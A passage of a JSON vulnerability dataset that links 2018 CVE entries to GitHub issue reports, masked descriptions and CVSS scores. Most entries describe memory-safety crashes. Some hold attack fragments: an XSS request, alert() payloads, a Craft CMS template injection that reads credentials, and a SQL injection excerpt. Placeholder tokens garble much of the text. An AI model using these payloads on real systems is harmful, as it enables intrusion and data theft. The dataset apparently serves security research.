        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20358",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/31",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/31",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:51:28Z",
        "description": "Invalid memory address dereference in lt_prediction(in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function lt_prediction .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20359",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/29",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/29",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:45:31Z",
        "description": "Invalid memory address dereference in APITAG APITAG . Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20360",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/32",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/32",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:55:49Z",
        "description": "Invalid memory address dereference in sbr_process_channel (in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function sbr_process_channel .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20361",
        "Issue_Url_old": "https://github.com/knik0/faad2/issues/30",
        "Issue_Url_new": "https://github.com/knik0/faad2/issues/30",
        "Repo_new": "knik0/faad2",
        "Issue_Created_At": "2018-12-17T06:49:16Z",
        "description": "Invalid memory address dereference in hf_assembly (in APITAG Hi, i found a issue in Freeware Advanced Audio Decoder NUMBERTAG FAAD NUMBERTAG It crashed in function hf_assembly .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20363",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/193",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/193",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2018-12-19T03:43:52Z",
        "description": "It exists a buffer overflow when use function APITAG Description When use function APITAG will be buffer overflow My test program NUMBERTAG channels in Libraw/bin Command and argument ./configure disable shared CFLAGS=\" fsanitize=address ggdb\" CXXFLAGS=\" fsanitize=address ggdb NUMBERTAG channels PATHTAG Crash Information ERRORTAG POC File FILETAG CREDIT APITAG Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20364",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/194",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/194",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2018-12-21T02:55:05Z",
        "description": "It exists SEGV when use function APITAG Description When use function APITAG will exist SEGV My test program postprocessing_benchmark in Libraw/bin Command and argument ./postprocessing_benchmark NUMBERTAG Crash Information ERRORTAG Version the commit is APITAG POC File FILETAG CREDIT APITAG Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20365",
        "Issue_Url_old": "https://github.com/LibRaw/LibRaw/issues/195",
        "Issue_Url_new": "https://github.com/libraw/libraw/issues/195",
        "Repo_new": "libraw/libraw",
        "Issue_Created_At": "2018-12-21T03:48:38Z",
        "description": "It exists heap buffer overflow when use function APITAG Description It exists heap buffer overflow in APITAG APITAG My test program NUMBERTAG channels in Libraw/bin Command and argument NUMBERTAG channels NUMBERTAG channels_crash Crash Information The output of exampletest with address sanitizer enabled ERRORTAG Version the commit is APITAG POC File FILETAG CREDIT APITAG Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20367",
        "Issue_Url_old": "https://github.com/wstmall/wstmart/issues/1",
        "Issue_Url_new": "https://github.com/wstmall/wstmart/issues/1",
        "Repo_new": "wstmall/wstmart",
        "Issue_Created_At": "2018-12-22T13:06:50Z",
        "description": "There are XSS vulnerabilities and CSRF vulnerabilities that can work together to add administrator users. Shang tao software APITAG e commerce system is a based on THINKPHP framework NUMBERTAG build B2B2C electric business platform, is now open source shopping system based on THINKPHP NUMBERTAG is the most perfect, with PC, mobile phone WAP, micro mall, android APP, the APP, APITAG applet, six side one, six side each other, have nowadays one of the most popular level NUMBERTAG distribution and function of micro bargaining, very suitable for enterprise and individual fast online business platform. The code of the system is clear and easy to understand, a large number of visual reports are convenient for operators to make decisions, rich marketing functions make the application scenarios of the system broad, good plug in mechanism makes the system more easy to expand. System operation is simple, safe and stable, update iteration is fast, is the majority of users direct use and secondary development of the best choice. Official address: FILETAG NUMBERTAG stored XSS Function point: mall some commodity details commodity consultation poc: POST PATHTAG HTTP NUMBERTAG Host: xx.xx.xx.xx User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG r NUMBERTAG Gecko NUMBERTAG Firefo NUMBERTAG Accept: / Accept Language: zh CN,zh; APITAG TW; APITAG HK; APITAG US; APITAG Accept Encoding: gzip, deflate Referer: FILETAG Content Type: application/x www form urlencoded; charset=UTF NUMBERTAG Requested With: APITAG Content Length NUMBERTAG Connection: close Cookie: APITAG APITAG UM_distinctid NUMBERTAG d5b NUMBERTAG b NUMBERTAG d NUMBERTAG d7d NUMBERTAG d NUMBERTAG c NUMBERTAG e7e NUMBERTAG d5b NUMBERTAG e; CNZZDATA NUMBERTAG C NUMBERTAG APITAG NUMBERTAG CSRF NUMBERTAG Function point: background management staff management login account poc: FILETAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20407",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/343",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/343",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-12-19T02:59:54Z",
        "description": "Memory leaks in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to memroy leaks in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash3.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20409",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/345",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/345",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-12-21T03:39:41Z",
        "description": "Heap buffer overflow in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to heap buffer overflow failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash4.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20421",
        "Issue_Url_old": "https://github.com/ethereum/go-ethereum/issues/18289",
        "Issue_Url_new": "https://github.com/ethereum/go-ethereum/issues/18289",
        "Repo_new": "ethereum/go-ethereum",
        "Issue_Created_At": "2018-12-12T03:29:59Z",
        "description": "EVM dynamic array maybe occupy large memory. System information Geth version: APITAG OS & Version: Linux Commit hash : no found Expected behaviour Dynamic array save itself length in memory and this length will restrict index of array . ERRORTAG See the assambly , APITAG implicate index of array check . ERRORTAG So call function a like this APITAG , APITAG will success execute ;but APITAG , APITAG will except. Actual behaviour We know Solc will auto insert array index check code in assambly ,so I try still rewrite the dynamic length . ERRORTAG Unfortunately ,it can't pass compile .It mean we rewrite the length of dynamic array APITAG I try to rewrite the array length on memory that is work . ERRORTAG Lastly ,I try writing a data to offset APITAG in array .EVM will occupy large memory NUMBERTAG MB) ERRORTAG Steps to reproduce the behaviour This is EVM test command (ignore gas limit ): ./evm code APITAG input APITAG gas NUMBERTAG debug run FILETAG FILETAG Backtrace Not found ,you can see large memory alloc output on console by debug flag .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20425",
        "Issue_Url_old": "https://github.com/libming/libming/issues/163",
        "Issue_Url_new": "https://github.com/libming/libming/issues/163",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-09-21T09:02:41Z",
        "description": "Null pointer dereference in pushdup (decompile.c NUMBERTAG A null pointer dereference bug was found in function APITAG CODETAG CODETAG to reproduce it ,run swftopython with APITAG APITAG credit: APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20427",
        "Issue_Url_old": "https://github.com/libming/libming/issues/164",
        "Issue_Url_new": "https://github.com/libming/libming/issues/164",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-09-21T09:12:00Z",
        "description": "Null pointer dereference in APITAG (decompile.c NUMBERTAG A null pointer dereference bug was found in function APITAG (decompile.c NUMBERTAG This is not the same issue with NUMBERTAG ERRORTAG to reproduce it ,run swftopython with APITAG APITAG credit: APITAG of Venustech FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20448",
        "Issue_Url_old": "https://github.com/philippe/FrogCMS/issues/20",
        "Issue_Url_new": "https://github.com/philippe/frogcms/issues/20",
        "Repo_new": "philippe/frogcms",
        "Issue_Created_At": "2018-12-18T13:31:22Z",
        "description": "The parameter under FILETAG is that the Database name has reflective XSS. The parameter under FILETAG is that the Database name has reflective XSS NUMBERTAG The Database name , username and password must be correct NUMBERTAG You can use the exp APITAG alert NUMBERTAG APITAG FILETAG NUMBERTAG Success FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2018-20450",
        "Issue_Url_old": "https://github.com/evanmiller/libxls/issues/34",
        "Issue_Url_new": "https://github.com/libxls/libxls/issues/34",
        "Repo_new": "libxls/libxls",
        "Issue_Created_At": "2018-12-23T15:01:22Z",
        "description": "Double Free vulneribility in read_MSAT function. Test Version dev version, git clone URLTAG Test Program APITAG Gdb and Backtrace ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20451",
        "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/2",
        "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/2",
        "Repo_new": "uvoteam/libdoc",
        "Issue_Created_At": "2018-12-25T06:51:08Z",
        "description": "A heap buffer overflow in APITAG process_file. Test Version latest version, git clone URLTAG Environment Ubuntu NUMBERTAG gcc version NUMBERTAG Test Program and command APITAG APITAG Gdb and Backtrace ERRORTAG Asan Debug Information ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20453",
        "Issue_Url_old": "https://github.com/uvoteam/libdoc/issues/1",
        "Issue_Url_new": "https://github.com/uvoteam/libdoc/issues/1",
        "Repo_new": "uvoteam/libdoc",
        "Issue_Created_At": "2018-12-24T15:41:59Z",
        "description": "There is a heap buffer overflow on APITAG getlong. Test Version latest version, git clone URLTAG Environment Ubuntu NUMBERTAG gcc version NUMBERTAG Test Program and command APITAG APITAG Gdb and Backtrace ERRORTAG Asan Debug Information ERRORTAG POC file FILETAG CREDIT Zhao Liang, Huawei Weiran Labs",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20454",
        "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/1",
        "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/1",
        "Repo_new": "coolboy0816/audit",
        "Issue_Created_At": "2018-12-25T02:13:26Z",
        "description": "APITAG XSS. Reflective XSS exists in search box APITAG JS can be injected into the page by APITAG twice encoding. The vulnerability involved is the parameter key in get reques.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20456",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12372",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12372",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-12-02T14:46:54Z",
        "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes ERRORTAG Steps to reproduce the behavior run APITAG where $STRING is one of the followings: APITAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20457",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12417",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12417",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-12-05T16:07:28Z",
        "description": "APITAG heap buffer overflow (OOB read) at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f2e NUMBERTAG c3 commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error message. Actual behavior rasm2 crashes. ERRORTAG Steps to reproduce the behavior Compile radare2 with asan (tried O3/ O0) run APITAG NUMBERTAG asr' etc).",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20458",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12374",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12374",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-12-02T15:37:07Z",
        "description": "APITAG heap buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rabin NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rabin2 shows binary property or exits abnormally Actual behavior rabin2 crashes ERRORTAG Steps to reproduce the behavior run APITAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20460",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12376",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12376",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-12-02T16:43:25Z",
        "description": "APITAG stack buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | | Architecture/bits of the file (mandatory) | | r2 v full output, not truncated (mandatory) | rasm NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior rasm2 exits with error messages Actual behavior rasm2 crashes ERRORTAG Steps to reproduce the behavior run APITAG Additional Logs, screenshots, source code, configuration dump, ... We also find another file generates from r2's APITAG results that also emits such an error when running APITAG .",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20461",
        "Issue_Url_old": "https://github.com/radare/radare2/issues/12375",
        "Issue_Url_new": "https://github.com/radareorg/radare2/issues/12375",
        "Repo_new": "radareorg/radare2",
        "Issue_Created_At": "2018-12-02T16:19:33Z",
        "description": "APITAG heap buffer overflow at PATHTAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | arm/arm NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG a0cfcdd commit: APITAG build NUMBERTAG Expected behavior r2 works normally Actual behavior r2 crashes Steps to reproduce the behavior run APITAG and get into the REPL run bd run ao ERRORTAG FILETAG Additional Logs, screenshots, source code, configuration dump, ... The root cause seems to be bd . For other arch binaries such as NUMBERTAG mips, ppc, it also works wrongly when bd is invoked firstly (below is a test against APITAG on Ubuntu NUMBERTAG FILETAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20465",
        "Issue_Url_old": "https://github.com/phuctam/Server-Side-Template-Injection-in-CraftCMS-/issues/1",
        "Issue_Url_new": "https://github.com/phuctam/server-side-template-injection-in-craftcms-/issues/1",
        "Repo_new": "phuctam/server-side-template-injection-in-craftcms-",
        "Issue_Created_At": "2018-12-10T09:52:43Z",
        "description": "Server Side Template Injection in APITAG Version: Craft CMS NUMBERTAG Authentication: Admin right Reproduce steps: Step1: Access Category group creation function and create new category group as shown below: {% set user = APITAG set password = APITAG user }} | {{ password }} FILETAG Step2: Access menu APITAG create new Category in the new category created above FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2018-20467",
        "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1408",
        "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1408",
        "Repo_new": "imagemagick/imagemagick",
        "Issue_Created_At": "2018-12-06T11:07:56Z",
        "description": "convert hang until NUMBERTAG CPU NUMBERTAG mem. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG I found a problem that will cause the program hang, and the CPU and memory will be exhausted. If limit memory, it will crash. Steps to Reproduce APITAG APITAG APITAG ulimit S NUMBERTAG it crash. System Configuration APITAG APITAG version: APITAG NUMBERTAG Q NUMBERTAG Environment APITAG system, version and so on): Ubuntu NUMBERTAG LTS Additional information: git commit APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20486",
        "Issue_Url_old": "https://github.com/Ppsoft1990/Metinfo6.1.3/issues/2",
        "Issue_Url_new": "https://github.com/ppsoft1990/metinfo6.1.3/issues/2",
        "Repo_new": "ppsoft1990/metinfo6.1.3",
        "Issue_Created_At": "2018-12-26T09:49:23Z",
        "description": "Stored XSS Vulnerability exists in the all versions of Metinfo NUMBERTAG Stored XSS Vulnerability exists in the all versions of Metinfo APITAG can be executed javascript code. Metinfo NUMBERTAG allows XSS via the PATHTAG url_array parameter. Metinfo official website: FILETAG Metinfo NUMBERTAG source code download page URLTAG FILETAG View the doc: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20502",
        "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/349",
        "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/349",
        "Repo_new": "axiomatic-systems/bento4",
        "Issue_Created_At": "2018-12-26T06:58:51Z",
        "description": "Allocate for large amounts of memory failed in APITAG at Bento NUMBERTAG when running mp NUMBERTAG hls. A crafted input will lead to Memory allocation failed in APITAG at Bento NUMBERTAG Triggered by ./mp NUMBERTAG hls crash6.mp4 Poc FILETAG Bento4 Version NUMBERTAG The ASAN information is as follows: ERRORTAG APITAG EMAILTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20519",
        "Issue_Url_old": "https://github.com/coolboy0816/audit/issues/2",
        "Issue_Url_new": "https://github.com/coolboy0816/audit/issues/2",
        "Repo_new": "coolboy0816/audit",
        "Issue_Created_At": "2018-12-26T08:05:15Z",
        "description": "APITAG ultra vires. First, register a user, create a resume, and then modify the job search intention, which can lead to the modification of any person and disclosure of personal information. Vulnerability proof\uff1a FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 8.1,
        "impactScore": 5.2,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20520",
        "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/27",
        "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/27",
        "Repo_new": "bg5sbk/minicms",
        "Issue_Created_At": "2018-12-14T14:07:55Z",
        "description": "APITAG reflective XSS in PATHTAG This is a reflective XSS vulnerability because \"echo $_SERVER FILETAG In Firefox and chrome, URL will be APITAG In IE, if has Redirection\uff0cURL will not be APITAG After logging in, XSS is triggered using exp Exp: URLTAG \"> APITAG alert(\"dudu\") APITAG Result: FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20541",
        "Issue_Url_old": "https://github.com/hfp/libxsmm/issues/287",
        "Issue_Url_new": "https://github.com/libxsmm/libxsmm/issues/287",
        "Repo_new": "libxsmm/libxsmm",
        "Issue_Created_At": "2018-11-26T10:50:55Z",
        "description": "reported buffer overflows. The following reports of asan errors in the generator were made in the Fedora tracker, but apparently against development source, not a version in Fedora, and it's not clear exactly how they're obtained. You may want to take a look anyhow. I haven't examined them other than to verify they don't match the NUMBERTAG source which is currently in Fedora. (I'll update the packaging to NUMBERTAG now I know about it; Fedora release notification is broken, unfortunately.) CVETAG CVETAG CVETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-20552",
        "Issue_Url_old": "https://github.com/appneta/tcpreplay/issues/530",
        "Issue_Url_new": "https://github.com/appneta/tcpreplay/issues/530",
        "Repo_new": "appneta/tcpreplay",
        "Issue_Created_At": "2018-12-19T06:02:42Z",
        "description": "APITAG NUMBERTAG heap buffer overflow problems APITAG && APITAG Both tested in Ubuntu NUMBERTAG bit, gcc NUMBERTAG tcpreplay (master NUMBERTAG d NUMBERTAG And APITAG returns ERRORTAG Triggered by APITAG POC1 poc file: URLTAG ASAN info: ERRORTAG POC2 poc file: URLTAG ASAN info: ERRORTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-20571",
        "Issue_Url_old": "https://github.com/AutismJH/damicms/issues/1",
        "Issue_Url_new": "https://github.com/autismjh/damicms/issues/1",
        "Repo_new": "autismjh/damicms",
        "Issue_Created_At": "2018-12-28T08:37:38Z",
        "description": "Arbitrary file read vulnerability . Read the global configuration file content by constructing a URL. FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20572",
        "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/166",
        "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/166",
        "Repo_new": "wuzhicms/wuzhicms",
        "Issue_Created_At": "2018-12-28T09:01:05Z",
        "description": "wuzhicms NUMBERTAG PATHTAG sql injection vulnerability. Vulnerability file: PATHTAG public\u00a0function\u00a0 APITAG \u00a0{\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$siteid\u00a0=\u00a0get_cookie('siteid');\u00a0\u00a0 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0$page\u00a0=\u00a0isset($GLOBALS FILETAG APITAG NUMBERTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-20573",
